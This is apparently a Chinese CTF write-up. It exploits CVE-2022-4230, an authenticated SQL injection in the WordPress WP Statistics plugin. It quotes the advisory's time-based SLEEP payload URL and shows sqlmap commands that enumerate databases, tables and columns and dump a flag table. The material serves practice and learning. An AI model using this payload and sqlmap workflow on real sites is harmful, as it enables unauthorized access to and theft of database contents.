打开什么都没有
使用dirsearch扫描到一个wp-admin
访问wp-admin是一个登陆页面
账号密码都在标题中
登陆后是这个页面
在WP Statistics < 13.2.9 -- 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com)中,里边有一段对漏洞的描述。
https://wpscan.com/vulnerability/a0e40cfd-b217-481c-8fc4-027a0a023312/
Log in as a user allowed to View WP Statistic and get a nonce via
https://example.com/wp-admin/admin-ajax.php?action=rest-nonce, and use it in the URL below, which will be delayed by 5s:
http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE\&name=words\&search_engine=aaa' AND (SELECT 5671 FROM (SELECT(SLEEP(5)))Mdgs)--%20HsBR
翻译一下就是
以允许查看WP统计信息的用户身份登录,并通过获取随机数
https://example.com/wp-admin/admin-ajax.php?action=rest-nonce
并在下面的URL中使用它,该URL将延迟5s
首先通过访问(必须要先登录过后台才行)
访问admin-ajax.php?action=rest-nonce
获得随机数706973b8cb
用浏览器访问,查看一下效果,其中 _wpnonce 的值是上面刚刚获取的随机数
访问:
wp-json/wp-statistics/v2/metabox?_wpnonce=63d5d76be3&name=words&search_engine=aaa
使用bp抓包,右键复制文件到本地
使用sqlmap,爆数据库
Python sqlmap.py -r 保存的文件名 --batch -dbs
爆出来四个库,其中的wordpress库很可疑
爆表
Python sqlmap.py -r 1.txt(保存的文件名) -D wordpress(库名) --tables --batch
爆字段
sqlmap -r 1.txt(保存的文件名) --batch -D wordpress(库名) -T flag(表名) --columns
爆字段数据
Python sqlmap.py -r 1.txt(保存的文件名) --batch
-D wordpress(库名) -T flag(表名) -C flag(字段名) --dump
或者直接省略爆字段名和字段数据直接使用下边的,知道表名就可以得出flag
python sqlmap.py -r 1.txt(保存的文件名) -D atomcms(库名) -T flag(表名) --dump -v --batch
